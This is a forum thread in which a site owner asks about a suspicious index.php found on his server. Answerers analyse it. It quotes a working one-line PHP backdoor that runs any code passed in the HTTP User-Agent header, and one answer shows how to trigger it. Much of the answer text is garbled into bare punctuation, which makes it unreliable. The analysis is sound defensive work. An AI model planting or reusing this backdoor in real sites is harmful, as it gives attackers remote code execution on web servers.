Suspicious PHP file may

Question

Suspicious PHP file may

I am looking for your help today to get some help about the file that I based on my FTP this morning. I am not professional in all of these PHP functions, which is why I am posting it here.

I found a file called index.php in the sub-images folder.

There is raw code:

<?php

if (eregi("final",$_SERVER['HTTP_USER_AGENT'])) { eval(str_replace('Mozilla/5.0 (3.1.final) ','',$_SERVER['HTTP_USER_AGENT'])); die; }

?>

Two PHP functions

eregi (); → http://php.net/manual/en/function.eregi.php
Eval (); → http://php.net/manual/en/function.eval.php

For the eval () function, they say this is very dangerous.

eval() , PHP-. . , , , , , .

, - .

- ?

,

0

php hackage

Patrice Poliquin 30 . '14 14:20

2

, eval-, , - -, .

, Mozilla/5.0 (3.1.final) ( ), PHP, eval.

( , , . POST cookie .)

+3

Boann 30 . '14 14:38

ʰᵈˑ · Accepted Answer · 2014-10-30T14:28:00+0000

.

eregi - PHP 5.3.0.
eregi - .

, ?

if (eregi("final",$_SERVER['HTTP_USER_AGENT'])) {

final HTTP_USER_AGENT, ....

'Mozilla/5.0 (3.1.final)' [blank] HTTP_USER_AGENT. script.

~~, "" - final - , , ; .~~

eval. , , eval , . "" , Mozilla/5.0 (3.1.final), , . :

,

Mozilla/5.0 (3.1.final)  echo 'Lol, you got hacked'

- str_replace Lol, you got hacked, eval echo. , .

Suspicious PHP file may

, ?

More articles: